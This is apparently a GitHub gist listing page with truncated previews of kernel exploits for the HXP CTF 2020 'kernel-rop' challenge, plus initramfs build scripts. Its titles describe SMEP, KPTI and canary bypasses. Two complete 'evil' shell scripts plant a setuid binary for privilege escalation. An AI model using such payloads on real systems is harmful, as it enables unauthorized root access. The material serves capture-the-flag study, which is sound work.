Skip to content

Instantly share code, notes, and snippets.

View brant-ruan's full-sized avatar
:octocat:
不要尖叫

Bonan Ruan brant-ruan

:octocat:
不要尖叫
View GitHub Profile
@brant-ruan
brant-ruan / exploit_ret2usr.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | no SMEP/SMAP; no KPTI; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
int64_t global_fd = 0;
@brant-ruan
brant-ruan / exploit_bypass_kpti_with_signal_handler.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with SIGSEGV handler; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
struct sigaction sigact;
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
@brant-ruan
brant-ruan / exploit_bypass_kpti_with_trampoline.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with KPTI trampoline; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
#!/bin/bash
# Compress initramfs with the included statically linked exploit
in=$1
out=$(echo $in | awk '{ print substr( $0, 1, length($0)-2 ) }')
gcc $in -static -o $out || exit 255
mv $out initramfs
pushd . && pushd initramfs
find . -print0 | cpio --null --format=newc -o 2>/dev/null | gzip -9 > ../initramfs.cpio.gz
popd
#!/bin/bash
# Decompress a .cpio.gz packed file system
rm -rf ./initramfs && mkdir initramfs
pushd . && pushd initramfs
cp ../initramfs.cpio.gz .
gzip -dc initramfs.cpio.gz | cpio -idm &>/dev/null && rm initramfs.cpio.gz
popd
@brant-ruan
brant-ruan / leak_canary.c
Last active September 2, 2022 09:30
HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
@brant-ruan
brant-ruan / overwrite_return_address.c
Created September 2, 2022 09:44
HXP CTF 2020 >> kernel-rop | partial exploit
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
int64_t global_fd = 0;
uint64_t cookie = 0;
@brant-ruan
brant-ruan / exploit_bypass_smep.c
Last active September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | no KPTI; no KASLR
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *VULN_DRV = "/dev/hackme";
void spawn_shell();
int64_t global_fd = 0;
@brant-ruan
brant-ruan / evil
Last active September 5, 2022 04:51
[exploit_bypass_kpti_with_modprobe] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with modprobe; no KASLR
#!/bin/sh
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu
@brant-ruan
brant-ruan / evil
Last active July 2, 2024 18:37
[exploit_bypass_kpti_with_coredump] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with coredump; no KASLR
#!/bin/sh
mv /evilsu /tmp/evilsu
chmod u+s /tmp/evilsu
chmod 777 /evilsu